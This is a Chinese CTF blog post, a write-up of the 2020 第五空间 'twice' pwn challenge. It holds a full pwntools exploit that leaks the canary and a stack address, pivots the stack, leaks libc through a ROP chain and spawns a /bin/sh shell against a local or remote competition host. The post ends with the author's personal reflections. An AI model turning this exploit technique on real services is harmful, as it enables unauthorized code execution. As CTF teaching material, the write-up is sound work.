<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon00.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">






  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="最近很懒了，被学校的一些恶心人的操作搞了身心俱疲">
<meta property="og:type" content="article">
<meta property="og:title" content="2020第五空间wp">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;07&#x2F;03&#x2F;2020%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4wp&#x2F;index.html">
<meta property="og:site_name" content="N0vice&#39;s Blog">
<meta property="og:description" content="最近很懒了，被学校的一些恶心人的操作搞了身心俱疲">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;07&#x2F;03&#x2F;2020%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4wp&#x2F;1.jpg">
<meta property="article:published_time" content="2020-07-03T15:36:46.000Z">
<meta property="article:modified_time" content="2020-07-03T16:06:43.261Z">
<meta property="article:author" content="N0vice">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;07&#x2F;03&#x2F;2020%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4wp&#x2F;1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/07/03/2020第五空间wp/"/>





  <title>2020第五空间wp | N0vice's Blog</title>
  








<meta name="generator" content="Hexo 4.1.0"></head>
<script src="https://cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css"/>
<script src="/live2d-widget/autoload.js"></script>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">N0vice's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/07/03/2020%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="N0vice">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="N0vice's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2020第五空间wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-07-03T23:36:46+08:00">
                2020-07-03
              </time>
            
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近很懒了，被学校的一些恶心人的操作搞了身心俱疲<a id="more"></a><br>这第五空间，据说去年是个垃圾比赛，水一水进决赛恰烂钱，我寻思着和北辰一样拿10w快乐一下，但是连线下都没进…<br>今年的题目质量据说比去年更有提高，起码不是全pwn了是不是<br>只给了3个pwn<br>签到被KMFL秒了<br>其他两个弱智题<br>一个of，给了源码，但是远程测得结果和源码不一样<br>还有一个arm题，环境起不来没办法跑当时（后来起来了也不知道咋调）<br>都没有远程环境了，连黑盒测试都测试不了<br>算了，就贴一个签到题的好了  </p>
<h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h2 id="twice"><a href="#twice" class="headerlink" title="twice"></a>twice</h2><p><img src="1.jpg" alt=""><br>没什么好说的，泄露canary，泄露rbp，调试得栈地址，栈迁移到栈上写ROP链<br>exp  </p>
<pre><code class="python"><span class="comment">#!/usr/bin/env python</span>
<span class="comment">#coding=utf-8</span>
<span class="keyword">from</span> pwn <span class="keyword">import</span>*
<span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *
<span class="keyword">import</span> sys
context.log_level = <span class="string">'debug'</span>
context.terminal = [<span class="string">'terminator'</span>,<span class="string">'-x'</span>,<span class="string">'sh'</span>,<span class="string">'-c'</span>]
binary = <span class="string">'./pwn'</span> 
local = <span class="number">1</span>
<span class="keyword">if</span> local == <span class="number">1</span>:
    p=process(binary)
<span class="keyword">else</span>:
    p=remote(<span class="string">"121.36.59.116"</span>,<span class="number">9999</span>)
elf=ELF(binary)
libc=ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)
<span class="function"><span class="keyword">def</span> <span class="title">exp</span><span class="params">()</span>:</span>
    p.recvuntil(<span class="string">"&gt;"</span>)
    p.send(<span class="string">"bbbb"</span>+<span class="string">"a"</span>*<span class="number">85</span>)
    p.recvuntil(<span class="string">"a"</span>*<span class="number">85</span>)
    canary = u64(p.recv(<span class="number">7</span>).rjust(<span class="number">8</span>,<span class="string">"\x00"</span>))
    <span class="keyword">print</span> hex(canary)
    stack_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))<span class="number">-0x70</span>
    log.success(<span class="string">"stack_addr==&gt;"</span> + hex(stack_addr))
    p.recvuntil(<span class="string">"&gt;"</span>)
    payload = p64(<span class="number">0</span>) + p64(<span class="number">0x0000000000400923</span>) + p64(elf.got[<span class="string">'puts'</span>]) + p64(elf.plt[<span class="string">'puts'</span>]) + p64(<span class="number">0x400630</span>)
    payload += <span class="string">"a"</span>*(<span class="number">88</span>-len(payload))
    payload += p64(canary) + p64(stack_addr) + p64(<span class="number">0x0000000000400879</span>)  <span class="comment"># 我连gadget都懒得定义了，凑合看吧，动手找一找应该就知道是什么了</span>
    p.send(payload)
    puts_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>, <span class="string">'\x00'</span>)) 
    libc_base = puts_addr - libc.sym[<span class="string">'puts'</span>]
    log.success(<span class="string">"puts_addr==&gt;"</span> + hex(puts_addr))
    log.success(<span class="string">"libc_base==&gt;"</span> + hex(libc_base))
    system = libc_base + libc.sym[<span class="string">'system'</span>]
    binsh = libc_base + libc.search(<span class="string">"/bin/sh"</span>).next()
    p.recvuntil(<span class="string">"&gt;"</span>)
    p.send(<span class="string">"bbbb"</span>+<span class="string">"a"</span>*<span class="number">85</span>)
    p.recvuntil(<span class="string">"a"</span>*<span class="number">85</span>)
    canary = u64(p.recv(<span class="number">7</span>).rjust(<span class="number">8</span>,<span class="string">"\x00"</span>))
    <span class="keyword">print</span> hex(canary)
    stack_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))<span class="number">-0x70</span>
    log.success(<span class="string">"stack_addr==&gt;"</span> + hex(stack_addr))
    p.recvuntil(<span class="string">"&gt;"</span>)
    payload = p64(<span class="number">0</span>) + p64(<span class="number">0x0000000000400923</span>) + p64(binsh) + p64(system) + p64(<span class="number">0xdeadbeef</span>)
    payload += <span class="string">"a"</span>*(<span class="number">88</span>-len(payload))
    payload += p64(canary) + p64(stack_addr) + p64(<span class="number">0x0000000000400879</span>)
    p.send(payload)
    p.interactive()
exp()</code></pre>
<h1 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h1><p>咕咕咕……<br>还没做出来，后面找时间做吧<br>很可能直接不做了（x<br></br><br></br><br>后面可能很长一段时间不会更博客了，没有强有力的激励，感觉心态特别难调整得过来<br>透过屏幕看到的其他人，总感觉他们的生活是那么的愉悦多彩，自己却好像过的不是人过的日子<br>最近特别懒，什么都不想动，只想睡觉，连这篇exp，都是比赛结束一周后才贴上来的，这一天天的感觉什么事情都没做但是又特别累，负面情绪特别严重，老是被一些还没到来的事情烦恼，天天想这那的，其实自己都懂该来的都会来，老想着它也阻止不了改变不了什么，只会徒增烦恼，但就是忍不住就会去想这些事情，把自己弄得很疲惫，同时又恨自己无力改变，很多特别小的事情，都没有能力去控制，更别说做出什么大事业，把自己关在电脑里，可能仅仅是一种逃避罢了，终究还是要面对，但是对未来的事情，却又底气不足<br>唯一可以强忍着不让自己崩溃的，可能就是胸前的党徽还有那份信仰了  </p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>您的鼓励将支持我继续努力！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat.png" alt="N0vice 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="N0vice 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    N0vice
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://yoursite.com/2020/07/03/2020%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4wp/" title="2020第五空间wp">http://yoursite.com/2020/07/03/2020%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4wp/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/24/GKCTF2020-write-up/" rel="next" title="GKCTF2020 write up">
                <i class="fa fa-chevron-left"></i> GKCTF2020 write up
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/09/20/%E6%88%91%E4%BB%AC%E7%9A%84%E5%AD%A6%E7%94%9F%E8%A6%81%E5%81%9A%E2%80%9C%E5%85%A8%E7%A7%91%E5%8C%BB%E7%94%9F%E2%80%9D/" rel="prev" title="我们的学生要做“全科医生”">
                我们的学生要做“全科医生” <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="N0vice" />
            
              <p class="site-author-name" itemprop="name">N0vice</p>
              <p class="site-description motion-element" itemprop="description">从前我是瞎的，如今我看得见</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">49</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/N0vice21" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.zhihu.com/people/luo-yu-piao" target="_blank" title="知乎">
                      
                        <i class="fa fa-fw fa-zhihu"></i>知乎</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://spacey.top/" title="Elli0t" target="_blank">Elli0t</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.ericdshen.com/" title="EDS" target="_blank">EDS</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://migraine-sudo.github.io" title="Migraine" target="_blank">Migraine</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://shawroot.cc/" title="Root" target="_blank">Root</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.yuque.com/pi3ntn/azmee3" title="Lime" target="_blank">Lime</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://mrbelieve128.github.io/" title="Mr.Believe" target="_blank">Mr.Believe</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://l0x1c.github.io/" title="L0x1c" target="_blank">L0x1c</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://binlep.top/" title="binlep" target="_blank">binlep</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://1p0ch.cn/" title="1p0ch" target="_blank">1p0ch</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://retr0.vip/" title="Retr_0" target="_blank">Retr_0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.pwn4fun.com/" title="Railgun" target="_blank">Railgun</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hackerpoet.com/" title="T4rn" target="_blank">T4rn</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/SopRomeo" title="penson" target="_blank">penson</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/lemon629/" title="lemon" target="_blank">lemon</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://surager.pub/" title="5ur4g3r" target="_blank">5ur4g3r</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.snowywar.top/" title="snowywar" target="_blank">snowywar</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Pwn"><span class="nav-number">1.</span> <span class="nav-text">Pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#twice"><span class="nav-number">1.1.</span> <span class="nav-text">twice</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Reverse"><span class="nav-number">2.</span> <span class="nav-text">Reverse</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">N0vice</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
